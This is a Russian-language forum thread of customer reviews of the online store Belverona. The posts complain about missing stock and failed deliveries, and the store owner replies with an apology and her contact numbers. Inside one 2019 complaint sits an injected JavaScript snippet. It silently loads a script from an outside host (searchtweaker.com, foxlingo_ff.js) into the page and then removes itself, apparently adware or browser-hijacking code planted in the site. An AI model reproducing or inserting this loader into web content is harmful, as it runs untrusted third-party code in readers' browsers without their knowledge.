НЕ заказывайте в инет-магазине Belverona

Делала заказ давно еще , все было ровно. Так как огромный выбор на сайте, решила свадебный комплект выбрать именно там. Выбирала долго,сосредоточенно. Так выбирала,что осталось 1,5 недели до свадьбы.. Оформила заказ, на что мне спустя несколько часов поступил ответ,что таких моделей нет в наличии. На мою просьбу подобрать альтернативу выкатили предложение в другой цветовой гамме и стоимостью в 1,5-2 раза дороже. Я в шоке и ужасе. Пока работница магазина отвечает, проходит уйма времени. Получается, и ассортимента там нет нихрена((( а карточки товаров не удаляют с сайта по понятным причинам. Что теперь делать мне, как потребителю с острой потребностью-остается загадкой. Огромное НЕСПАСИБО магазину.
09.08.2019
Делала в этом магазине пару заказов и осталась очень довольна. Вера - очень внимательна и отзывчива к своим своим покупателям. Я перед первым заказом в поиск "отзывы о www.belverona.ru" и наткнулась на эту недоброжелательную тему. Но почитав отзывы решила, что девочки писавшие отрицательные отзывы в любом случае получили свои покупки (что сейчас при таком обилии интернет магазинов однодневок и то здорово) решила рискнуть. И была приятно удивлена. Вера и отзванивалась и переписывалась, и предупреждала о возникающих нюансах. Доставка была очень быстрой. И посылочки аккуратно упакованы. Так что я осталась очень довольна от обоих моих заказов.
08.12.2016
Аналогичная ситуация через 3 года!!! Ужасно. Заказ свой я в итоге так и не получила. Устроили качели длинною в 3 дня, а так и не привезли во время. Пожалела я конкретно, никогда не сталкивалась в Москве с таким обслуживанием. Заказ был в подарок, что еще сильнее меня огорчило.Насторожило меня сразу то, что не отзвонились, не отписались, как это обычно бывает, но вроде на следующий день, уже после моего звонка обещала странная тетка слезно все привезти и в срок, чего конечно не случилось. И это за 3 дня+ долгие бредовые разговоры со странной теткой, из которых получалось, что я должна войти в их какие то там проблемы, склады, пробки,на метро не могут.Однозначно, остерегайтесь!!![removed](function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();[removed]
15.03.2014
Уважаемая Катерина, милые дамы! Во первых, приношу свои извинения Катерине за «смазанный» заказ. Вы абсолютно правы в своих претензиях и негодовании – заказ выполнен отвратительно. Но тем не менее, хочу объясниться. Эта ситуация была связана во многом с предпраздничными днями (перед 8 марта) – я , увы не справлялась с лавиной заказов и те, некоторые не смогла выполнить хорошо, особенно те, которые решила отвезти сама , не передавая в службу заказов. С этим же связан и заспанный голосJ - накануне я вернулась с почты в 2 часа ночи...В буднях начинающего интернет магазина, обремененного кредитами – и такое бывает. Тем не менее, Вы правы. К тому же , девушки очень часто ошибаются с выбором размеров и благодарны ,когда я советую им что-либо – тут я ошибаюсь редко. Мне правда показалась странной ситуация , когда бюст выбран одного размера ,а купальник другого и я запуталась. А огромный поток входящей информации помешал мне понять Вас с первого раза. Просто я хотела все сделать лучше, но , видно , перестараласьJ Что касается цены на купальник – то на самом деле - на разные цвета данной модели - цены разные , об этом и на сайте информация была, единственно , сейчас уже не уверена, предупредила ли я Вас об этом дополнительно. Я сейчас жалею ,конечно, что не опустила эти 50 рублей, а машинально переделала счет. С одним я не согласна - не было с моей стороны некорректного обращения по отношению к Вам, и согласитесь, эпитеты «промямлила» и «наезд» - здесь явно неуместны.. В остальном, повторяю, полностью с Вами согласна ,Екатерина, доставка была мучительной и несвоевременной, еще раз извините и не обижайтесь. Надеюсь, качеством комплекта и купальника Вы остались довольны ,за это я ручаюсь полностью. Я прилагаю максимум усилий , чтобы исправить свою логистику и доставлять моим клиентам не только качественный товар, но и приятные эмоции. Милые девушки, я всем желаю удачи и счатливых теплых деньковJ У вас очень симпатичное сообщество. С уважением, Степанова Вера Магазин BELVERONA www.belverona.ru(495) 989 2152, 8 926 245 21 53
04.05.2011
Да уж, мне ни ка другому ясна ситуация, только с другим магазином ,заказала сыну рейму (слит.) тоже через инт-маг, сказал привезут завтра, в итоге тоже им звонила сама, кормили завтраками ,в итоге я пошла и купила в магазине почти такой же только фирма другая ( и не жалею) ,а через три дня ко мне курьер приехал ,я послала его к чертям собачим.
04.04.2011
Да, капец полный(((
29.03.2011
Выставка "Мать и дитя"!!!!!!!!!!!!!!! Не Детский мир:)